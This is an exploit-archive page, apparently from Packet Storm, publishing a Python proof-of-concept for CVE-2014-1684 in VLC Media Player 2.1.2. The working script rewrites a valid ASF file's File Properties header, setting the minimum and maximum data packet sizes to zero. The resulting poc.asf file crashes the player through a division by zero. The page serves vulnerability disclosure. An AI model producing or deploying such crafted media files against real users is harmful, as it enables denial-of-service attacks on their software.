exploit the possibilities

VLC Media Player 2.1.2 Denial Of Service

VLC Media Player 2.1.2 Denial Of Service
Posted Feb 6, 2014
Authored by Saif El-Sherei

VLC Media Player version 2.1.2 denial of service proof of concept integer division by zero exploit.

tags | exploit, denial of service, proof of concept
advisories | CVE-2014-1684
MD5 | a490bc0a906f98ebd4b3d0390c4d4492

VLC Media Player 2.1.2 Denial Of Service

Change Mirror Download
#!/usr/bin/python
# VLC Media Player up to 2.1.2 DOS POC Integer Division By zero in ASF Demuxer
# VLC Media Player is prone to DOS utilizing a division by zero error if minimium data packet size
# is equal to zero. this was tested on windows XP sp3 and affects all versions of vlc till latest 2.1.2
# to run this script you need to install python bitstring module
# usage you supply any valid asf and the script will produxe a POC asf that will crash vlc

import sys
from bitstring import BitArray

f = open(sys.argv[1],'r+b')

f.seek(0,2)

size = f.tell()

print "[*] file size: %d" % size

f.seek(0,0)

print "[*] ReeeeeWWWWWWiiiiiNNNNNNND"

fb = BitArray(f)

index = fb.find('0xa1dcab8c47a9cf118ee400c00c205365',bytealigned=True)

print "[*] found file properties GUID"
print "[*] File properties GUID: %s" % fb[index[0]:(index[0]+128)]

# index of minumum packet size in File Proprties header
i_min_data_pkt_size = index[0] + 736

print "[*] Original Minimum Data Packet Size: %s" % fb[i_min_data_pkt_size:i_min_data_pkt_size+32].hex
print "[*] Original Maximum Data Packet Size: %s" % fb[i_min_data_pkt_size+32:i_min_data_pkt_size+64].hex

# Accroding to ASF standarad the minimum data size and the maximum data size should be equal
print "[*] Changing Miniumum and Maximum Data packet size to 0"

# changing the data packets in bit array

fb[i_min_data_pkt_size:i_min_data_pkt_size+8] = 0x00
fb[i_min_data_pkt_size+8:i_min_data_pkt_size+16] = 0x00
fb[i_min_data_pkt_size+16:i_min_data_pkt_size+24] = 0x00
fb[i_min_data_pkt_size+24:i_min_data_pkt_size+32] = 0x00
fb[i_min_data_pkt_size+32:i_min_data_pkt_size+40] = 0x00
fb[i_min_data_pkt_size+40:i_min_data_pkt_size+48] = 0x00
fb[i_min_data_pkt_size+48:i_min_data_pkt_size+56] = 0x00
fb[i_min_data_pkt_size+56:i_min_data_pkt_size+64] = 0x00

print "[*] POC File Created poc.asf"

of = open('poc.asf','w+b')
fb.tofile(of)
of.close()
f.close()
Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close